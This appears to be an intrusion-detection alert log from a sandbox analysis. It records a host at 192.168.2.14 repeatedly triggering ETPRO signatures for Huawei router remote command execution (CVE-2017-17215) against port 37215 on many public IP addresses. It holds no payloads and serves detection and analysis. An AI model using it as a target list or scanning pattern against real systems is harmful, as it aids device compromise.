                                            06/14/24-10:44:22.860808TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5998837215192.168.2.14156.123.43.89
                                            06/14/24-10:43:58.276908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4610437215192.168.2.14156.174.102.212
                                            06/14/24-10:43:34.660266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4215237215192.168.2.14156.47.96.254
                                            06/14/24-10:44:22.859300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5184037215192.168.2.14197.117.210.2
                                            06/14/24-10:44:14.668343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5155037215192.168.2.1441.40.95.78
                                            06/14/24-10:43:43.943252TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3894037215192.168.2.14197.47.1.149
                                            06/14/24-10:44:18.779099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4272637215192.168.2.14156.222.116.55
                                            06/14/24-10:43:41.846621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4573437215192.168.2.14197.105.185.234
                                            06/14/24-10:43:43.969111TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5833637215192.168.2.1441.32.192.182
                                            06/14/24-10:44:24.916849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5885437215192.168.2.14156.46.94.175
                                            06/14/24-10:43:36.702744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5408837215192.168.2.1441.34.13.214
                                            06/14/24-10:43:48.029872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6011037215192.168.2.14197.196.252.238
                                            06/14/24-10:44:16.717280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5152037215192.168.2.1441.36.31.130
                                            06/14/24-10:44:18.764952TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5062837215192.168.2.1441.2.65.207
                                            06/14/24-10:44:20.827874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3504837215192.168.2.14197.38.105.102
                                            06/14/24-10:44:16.714880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3867437215192.168.2.1441.196.216.201
                                            06/14/24-10:43:54.186362TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5610437215192.168.2.14197.177.41.44
                                            06/14/24-10:44:14.684091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3347237215192.168.2.14197.185.40.54
                                            06/14/24-10:44:10.567207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3874637215192.168.2.14156.193.178.117
                                            06/14/24-10:44:10.543765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4587437215192.168.2.14156.80.187.192
                                            06/14/24-10:43:58.274787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3866637215192.168.2.1441.3.45.49
                                            06/14/24-10:43:36.718533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4763637215192.168.2.1441.253.22.215
                                            06/14/24-10:43:54.202275TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4873437215192.168.2.1441.119.155.206
                                            06/14/24-10:44:14.671873TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3914037215192.168.2.14197.120.162.88
                                            06/14/24-10:44:08.505365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5580437215192.168.2.1441.99.9.164
                                            06/14/24-10:44:02.366412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4145437215192.168.2.14197.58.178.120
                                            06/14/24-10:43:48.021180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3922837215192.168.2.1441.152.181.119
                                            06/14/24-10:43:54.185013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4468837215192.168.2.14156.100.140.144
                                            06/14/24-10:43:58.291179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4512237215192.168.2.14197.158.143.82
                                            06/14/24-10:44:27.001335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3329437215192.168.2.14197.112.201.236
                                            06/14/24-10:44:12.647141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3524837215192.168.2.14197.148.30.69
                                            06/14/24-10:44:04.411782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3953837215192.168.2.14197.83.6.202
                                            06/14/24-10:43:54.200268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3602437215192.168.2.14197.227.131.187
                                            06/14/24-10:44:29.024975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3319037215192.168.2.14197.118.25.7
                                            06/14/24-10:43:52.150126TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3302437215192.168.2.14197.174.140.218
                                            06/14/24-10:44:27.000588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3865437215192.168.2.1441.174.24.165
                                            06/14/24-10:44:04.411554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4474037215192.168.2.14197.6.177.187
                                            06/14/24-10:44:31.082407TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5657637215192.168.2.1441.33.174.12
                                            06/14/24-10:43:56.229183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5691637215192.168.2.14197.73.207.194
                                            06/14/24-10:44:35.181126TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4823037215192.168.2.1441.82.252.247
                                            06/14/24-10:44:22.861092TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5450637215192.168.2.14197.30.211.231
                                            06/14/24-10:44:08.519405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5832237215192.168.2.14156.8.77.42
                                            06/14/24-10:44:14.671207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6066837215192.168.2.14197.32.72.215
                                            06/14/24-10:43:43.967641TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3309037215192.168.2.1441.178.137.95
                                            06/14/24-10:44:31.053463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5112837215192.168.2.14156.139.82.141
                                            06/14/24-10:44:16.733432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6072637215192.168.2.14156.60.60.101
                                            06/14/24-10:43:39.789157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5943237215192.168.2.14197.70.230.42
                                            06/14/24-10:43:37.762380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4838237215192.168.2.14197.53.31.254
                                            06/14/24-10:44:14.684669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3344837215192.168.2.1441.113.99.236
                                            06/14/24-10:44:35.183300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3584037215192.168.2.14197.213.183.89
                                            06/14/24-10:43:50.073936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5560437215192.168.2.1441.165.81.143
                                            06/14/24-10:44:14.682833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4093637215192.168.2.1441.133.232.120
                                            06/14/24-10:43:41.909425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3723037215192.168.2.14156.14.64.4
                                            06/14/24-10:44:14.668969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6073837215192.168.2.14156.92.9.180
                                            06/14/24-10:44:10.548364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5319237215192.168.2.14197.79.190.147
                                            06/14/24-10:44:18.778156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4457037215192.168.2.1441.248.2.52
                                            06/14/24-10:44:04.420710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3916637215192.168.2.14197.111.236.85
                                            06/14/24-10:44:14.681549TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3605437215192.168.2.14197.3.122.209
                                            06/14/24-10:44:29.013072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5786037215192.168.2.1441.83.247.133
                                            06/14/24-10:44:16.733039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4745237215192.168.2.14197.117.163.43
                                            06/14/24-10:43:43.942063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5971237215192.168.2.1441.185.136.98
                                            06/14/24-10:44:10.566409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6060037215192.168.2.1441.194.202.153
                                            06/14/24-10:44:12.646257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4437237215192.168.2.1441.208.12.57
                                            06/14/24-10:44:24.934197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5565837215192.168.2.1441.233.96.229
                                            06/14/24-10:44:14.670122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3835637215192.168.2.14156.147.24.19
                                            06/14/24-10:44:06.451785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4355237215192.168.2.14156.104.223.208
                                            06/14/24-10:43:54.198483TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3433637215192.168.2.1441.117.6.125
                                            06/14/24-10:43:54.198697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3882237215192.168.2.14197.205.131.148
                                            06/14/24-10:44:22.880306TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5644637215192.168.2.14197.141.96.180
                                            06/14/24-10:43:36.704765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4269237215192.168.2.14156.218.27.154
                                            06/14/24-10:44:02.365850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4481837215192.168.2.14156.62.237.212
                                            06/14/24-10:44:14.688316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6023037215192.168.2.14156.40.167.119
                                            06/14/24-10:43:36.727217TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4378837215192.168.2.14197.166.206.193
                                            06/14/24-10:43:58.275405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5434037215192.168.2.1441.197.173.210
                                            06/14/24-10:43:58.277757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4787237215192.168.2.1441.65.231.252
                                            06/14/24-10:44:14.669949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4170037215192.168.2.14197.198.90.99
                                            06/14/24-10:43:34.677590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5698837215192.168.2.14197.219.159.225
                                            06/14/24-10:44:22.858128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4865837215192.168.2.1441.185.54.184
                                            06/14/24-10:44:06.472393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5571637215192.168.2.14156.194.181.251
                                            06/14/24-10:43:34.662565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5615237215192.168.2.1441.137.12.98
                                            06/14/24-10:44:31.053276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4323037215192.168.2.1441.21.142.157
                                            06/14/24-10:43:34.679627TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4304837215192.168.2.1441.99.251.245
                                            06/14/24-10:43:45.966535TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5791637215192.168.2.14156.173.140.140
                                            06/14/24-10:43:43.967569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3401037215192.168.2.1441.236.85.29
                                            06/14/24-10:44:06.450142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5393437215192.168.2.1441.86.94.150
                                            06/14/24-10:43:39.809498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4142637215192.168.2.1441.17.64.40
                                            06/14/24-10:44:35.182486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6002037215192.168.2.1441.34.137.86
                                            06/14/24-10:44:02.382668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3407037215192.168.2.14156.24.127.200
                                            06/14/24-10:44:12.645993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5369637215192.168.2.14156.143.130.201
                                            06/14/24-10:44:10.549054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4925637215192.168.2.1441.3.172.232
                                            06/14/24-10:44:29.014690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3317437215192.168.2.14156.0.188.14
                                            06/14/24-10:44:22.858099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4609237215192.168.2.14197.115.144.49
                                            06/14/24-10:44:04.424841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5721837215192.168.2.14197.93.120.75
                                            06/14/24-10:44:22.878204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5378037215192.168.2.1441.36.26.139
                                            06/14/24-10:44:31.051920TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4836237215192.168.2.14197.134.225.29
                                            06/14/24-10:44:04.420093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5702437215192.168.2.1441.211.134.46
                                            06/14/24-10:43:36.701233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4681637215192.168.2.14197.44.112.156
                                            06/14/24-10:43:37.772517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4437437215192.168.2.14156.87.176.139
                                            06/14/24-10:44:31.093021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5621037215192.168.2.14156.24.91.249
                                            06/14/24-10:44:04.405726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5949237215192.168.2.14156.39.215.149
                                            06/14/24-10:43:39.812449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5015837215192.168.2.14156.239.198.140
                                            06/14/24-10:43:54.200127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3953637215192.168.2.1441.75.46.141
                                            06/14/24-10:44:00.339346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5561837215192.168.2.14197.43.156.253
                                            06/14/24-10:43:37.760119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5803037215192.168.2.14197.212.199.139
                                            06/14/24-10:43:37.759524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3484637215192.168.2.1441.93.110.50
                                            06/14/24-10:43:43.972128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4359237215192.168.2.1441.43.22.251
                                            06/14/24-10:43:50.073245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5246037215192.168.2.1441.25.69.12
                                            06/14/24-10:44:06.451276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4783237215192.168.2.14197.238.83.69
                                            06/14/24-10:44:20.827754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3886637215192.168.2.14156.47.243.191
                                            06/14/24-10:44:08.517513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3484637215192.168.2.14197.97.142.62
                                            06/14/24-10:44:16.737826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4291237215192.168.2.1441.82.130.16
                                            06/14/24-10:43:45.965913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4295837215192.168.2.14156.234.154.93
                                            06/14/24-10:44:10.549015TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5989837215192.168.2.14156.106.180.152
                                            06/14/24-10:44:33.135247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3874437215192.168.2.14156.120.70.117
                                            06/14/24-10:44:10.543899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5737237215192.168.2.14156.85.114.158
                                            06/14/24-10:43:43.971652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4416037215192.168.2.1441.49.197.82
                                            06/14/24-10:43:50.071285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4412637215192.168.2.14156.74.76.176
                                            06/14/24-10:43:50.115119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4685837215192.168.2.1441.116.156.13
                                            06/14/24-10:44:31.056326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5930637215192.168.2.14197.205.111.107
                                            06/14/24-10:44:10.546860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5450037215192.168.2.14197.46.102.79
                                            06/14/24-10:43:56.250434TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5419637215192.168.2.14156.43.56.143
                                            06/14/24-10:43:54.185262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5772437215192.168.2.1441.37.218.156
                                            06/14/24-10:44:22.879394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5519037215192.168.2.14197.212.180.53
                                            06/14/24-10:43:41.848698TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3795837215192.168.2.14156.235.60.2
                                            06/14/24-10:43:37.761638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4923637215192.168.2.14156.7.137.241
                                            06/14/24-10:43:48.018597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5967637215192.168.2.1441.151.188.231
                                            06/14/24-10:43:36.701201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5255437215192.168.2.14197.240.208.72
                                            06/14/24-10:43:41.906000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3374637215192.168.2.14156.225.180.15
                                            06/14/24-10:44:20.827573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5179837215192.168.2.1441.211.49.238
                                            06/14/24-10:44:22.878831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4166637215192.168.2.14197.97.124.166
                                            06/14/24-10:44:08.517576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3861437215192.168.2.1441.22.90.54
                                            06/14/24-10:43:34.662476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3794637215192.168.2.1441.150.152.40
                                            06/14/24-10:43:41.906105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4615637215192.168.2.14197.86.217.91
                                            06/14/24-10:43:34.679124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5931237215192.168.2.14156.181.84.194
                                            06/14/24-10:44:00.322718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5267837215192.168.2.14197.146.109.191
                                            06/14/24-10:44:14.687771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5478037215192.168.2.1441.251.190.13
                                            06/14/24-10:43:34.675865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4725837215192.168.2.14156.53.22.9
                                            06/14/24-10:43:41.847727TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5608237215192.168.2.14156.124.119.79
                                            06/14/24-10:44:26.977788TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3981837215192.168.2.14156.126.92.79
                                            06/14/24-10:44:12.642624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4934637215192.168.2.14197.72.112.17
                                            06/14/24-10:44:22.879295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5954637215192.168.2.14197.155.108.21
                                            06/14/24-10:44:10.543051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5966037215192.168.2.14156.108.250.239
                                            06/14/24-10:43:52.143380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5527637215192.168.2.14197.104.230.253
                                            06/14/24-10:44:18.776806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6084037215192.168.2.14197.216.203.61
                                            06/14/24-10:44:18.762573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4968437215192.168.2.14197.60.150.175
                                            06/14/24-10:43:41.846091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5563037215192.168.2.14156.24.7.74
                                            06/14/24-10:43:58.289152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6030437215192.168.2.1441.123.209.164
                                            06/14/24-10:44:24.916971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4828037215192.168.2.1441.187.216.33
                                            06/14/24-10:43:54.202206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5295437215192.168.2.14197.172.126.247
                                            06/14/24-10:43:36.704524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3460237215192.168.2.14156.206.126.195
                                            06/14/24-10:43:39.813531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5552837215192.168.2.14156.137.254.152
                                            06/14/24-10:43:36.702359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5193637215192.168.2.14197.180.37.137
                                            06/14/24-10:44:18.762942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4064837215192.168.2.14156.218.58.192
                                            06/14/24-10:43:36.702055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3458837215192.168.2.14197.76.79.55
                                            06/14/24-10:44:26.979403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5912437215192.168.2.14156.97.242.252
                                            06/14/24-10:43:36.702404TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5529437215192.168.2.1441.54.167.203
                                            06/14/24-10:44:04.408296TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3667837215192.168.2.14156.82.87.144
                                            06/14/24-10:44:12.617562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5005637215192.168.2.1441.91.148.111
                                            06/14/24-10:43:41.899963TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3434837215192.168.2.14197.239.144.132
                                            06/14/24-10:43:34.678602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3336037215192.168.2.14197.144.100.35
                                            06/14/24-10:43:58.291338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3935437215192.168.2.14197.85.216.214
                                            06/14/24-10:44:06.451624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4551837215192.168.2.14197.40.161.102
                                            06/14/24-10:43:58.292987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4754837215192.168.2.14197.211.36.73
                                            06/14/24-10:44:00.322629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3975037215192.168.2.14156.84.217.45
                                            06/14/24-10:44:16.719099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4252037215192.168.2.14197.39.19.90
                                            06/14/24-10:43:39.792192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4244837215192.168.2.1441.193.247.157
                                            06/14/24-10:44:14.689437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5053637215192.168.2.1441.30.208.24
                                            06/14/24-10:44:16.716098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3406237215192.168.2.14197.146.6.115
                                            06/14/24-10:43:54.184246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4345037215192.168.2.14156.44.97.233
                                            06/14/24-10:44:08.501189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5472637215192.168.2.14156.116.211.129
                                            06/14/24-10:44:27.001889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5224437215192.168.2.14197.165.240.151
                                            06/14/24-10:43:50.073151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4159837215192.168.2.14156.228.124.47
                                            06/14/24-10:44:24.916883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4317637215192.168.2.14197.98.80.139
                                            06/14/24-10:44:16.717837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4862837215192.168.2.1441.5.179.64
                                            06/14/24-10:44:00.326075TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4377837215192.168.2.14156.77.74.218
                                            06/14/24-10:44:20.805063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3855637215192.168.2.1441.15.157.185
                                            06/14/24-10:43:50.114973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5753837215192.168.2.14197.75.69.254
                                            06/14/24-10:44:26.980278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4298037215192.168.2.14197.13.161.131
                                            06/14/24-10:44:29.024949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5387437215192.168.2.14156.43.58.139
                                            06/14/24-10:44:26.997403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5447837215192.168.2.14156.163.182.246
                                            06/14/24-10:44:18.777929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3376837215192.168.2.14197.113.135.131
                                            06/14/24-10:43:54.198962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3887837215192.168.2.14197.121.113.0
                                            06/14/24-10:44:00.339195TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4197237215192.168.2.14156.61.1.42
                                            06/14/24-10:44:26.998700TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4954637215192.168.2.1441.147.118.37
                                            06/14/24-10:44:12.645056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4054637215192.168.2.1441.148.231.116
                                            06/14/24-10:43:41.848725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5625037215192.168.2.14197.185.51.48
                                            06/14/24-10:43:54.201610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5331037215192.168.2.14156.161.11.244
                                            06/14/24-10:44:26.980041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5495837215192.168.2.14156.198.156.108
                                            06/14/24-10:44:31.055746TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5780637215192.168.2.14156.162.13.112
